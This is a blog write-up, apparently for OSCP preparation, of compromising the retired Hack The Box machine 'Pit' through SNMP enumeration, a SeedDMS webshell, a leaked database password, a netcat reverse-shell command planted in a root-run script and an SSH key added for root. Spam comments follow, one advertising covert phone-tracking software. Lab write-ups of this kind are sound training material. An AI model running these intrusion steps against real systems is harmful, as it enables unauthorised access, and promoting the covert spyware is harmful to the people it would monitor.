OSCP PREPROTİONS – HTB Pit

Pit is a vulnerable machine with linux operating system among retired machines and it is expected to obtain user and root flags using these vulnerabilities.
We perform a network scan with nmap to recognize the target machine.
Classic Scan

Full Port Scan

As a result of port scanning, 22/tcp ssh OpenSSH, 80/tcp http nginx 1.14, 9090/tcp ssl/zeus-admin, 161/udp snmp ports are open.
Here we encountered dms-pit.htb and we save it to the host file.

We provide snmp enumueratio
nmap -A -sU -p161 10.10.10.241 -Pn

snmpwalk -v2c -c public 10.10.10.241 .

/var/www/html/seeddms51x/seeddms
/usr/bin/monitor
Their files are remarkable
Let’s try to go to it when there is a file in the html.
Here it redirected us to the login page

We tried the default passwords to log in here, but we could not see the user michelle, so we tried the same username and password here and we were able to log in.

Here we provide enumueration

Let’s see if there is a vulnerability in Searchploit

We have seen that there is an RCE vulnerability here. Let’s save the code given here as Shell.php and try to install it

Here we see the document id as 29, which is written in the fourth step of the vulnerability.
example.com/data/1048576/”document_id”/1.php?cmd=cat+/etc/passwd
let’s log in as

In this way, we read the passwd file and then tried various ways to give us Shell, but we could not get any Shell, so we provide enumeration via this url.

../../../../conf/settings.xml directory we see the settinggs xml file
Here we access credential information.

dbDriver=”mysql” dbHostname=”localhost” dbDatabase=”seeddms” dbUser=”seeddms” dbPass=”ied^ieY6xoquu” doNotCheckVersion=”false”>
here was the login screen on port 9090, let’s log in by trying this username and password

We tried to log in with seeddms username without success on user michelle
we were able to make a surprise entry

We saw the terminal server in the bottom left option.

Here we were able to get the user flag but not the root directory, so we continue with the local enumeration.

We did not get any information from linpeas.sh, let’s look at the monitor file from smpwalk /usr/bin/monitor
When we went and looked, we couldn’t see anything.
We saw it using ls -ld because only root is authorized.

With Getfacl we displayed the owner, group and Access Control List (ACL).

Let’s see if we can write something in it or not;

We can write in it
Here instead of check.sh we make it give us a reverseshell.
echo “nc 10.10.14.157 4444 -e /bin/bash” > /usr/local/monitoring/check.sh

Then we listen with nc and smtp check to work
snmpwalk -m +MY-MIB -v2c -c public 10.10.10.10.241 nsExtendObjects
we got the command sell on root yetsinde to the user
does not give any output here

Here we encounter the problem, this problem does not give us output from the command we wrote, we tried to get revereshell, it did not give it again, let’s add the .pub plugin to the root .ssh folder here, the file we created with sshkeygen

Let’s take this key and add it to the root termianl

Then let’s use this ssh key and get shel

We finally got our root flag
A difficult and challenging machine 🙂

Comments

  1. sklep internetowy

    Everything posted was very logical. But, what about this?
    suppose you were to create a awesome post title? I mean, I don’t want to tell you how to run your website, but
    suppose you added a headline to maybe grab people’s attention? I mean OSCP PREPROTİONS – HTB Pit – Muhammed AYGÜN is a little plain. You might
    peek at Yahoo’s front page and see how they write post titles to get
    viewers to click. You might add a related video or a pic or
    two to grab people interested about everything’ve written. Just
    my opinion, it might make your blog a little livelier.
    I saw similar here: E-commerce

  2. sklep internetowy

    Hi there would you mind stating which blog platform you’re using?
    I’m looking to start my own blog soon but I’m having a difficult time deciding between BlogEngine/Wordpress/B2evolution and Drupal.
    The reason I ask is because your design seems different then most blogs and I’m looking for something completely unique.
    P.S Sorry for getting off-topic but I had to ask! I saw similar here:
    Dobry sklep

  3. najlepszy sklep

    Good day! Do you know if they make any plugins to assist with SEO?
    I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good gains.
    If you know of any please share. Cheers! You can read similar blog here: Sklep online

  4. dobry sklep

    Hello! Do you know if they make any plugins to help with Search Engine Optimization? I’m trying to get my blog to rank for some targeted keywords but I’m not seeing very good results.

    If you know of any please share. Many thanks! You can read similar text here:
    Sklep online

  5. Suivre Téléphone

    La compatibilité du logiciel de suivi mobile est très bonne et il est compatible avec presque tous les appareils Android et iOS. Après avoir installé le logiciel de suivi sur le téléphone cible, vous pouvez afficher l’historique des appels du téléphone, les messages de conversation, les photos, les vidéos, suivre la position GPS de l’appareil, activer le microphone du téléphone et enregistrer l’emplacement environnant.

  6. Backlinks List

    Hey there! Do you know if they make any plugins
    to help with Search Engine Optimization? I’m trying to get my blog to rank for some targeted keywords but I’m
    not seeing very good gains. If you know of any
    please share. Thanks! I saw similar art here: Link Building

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir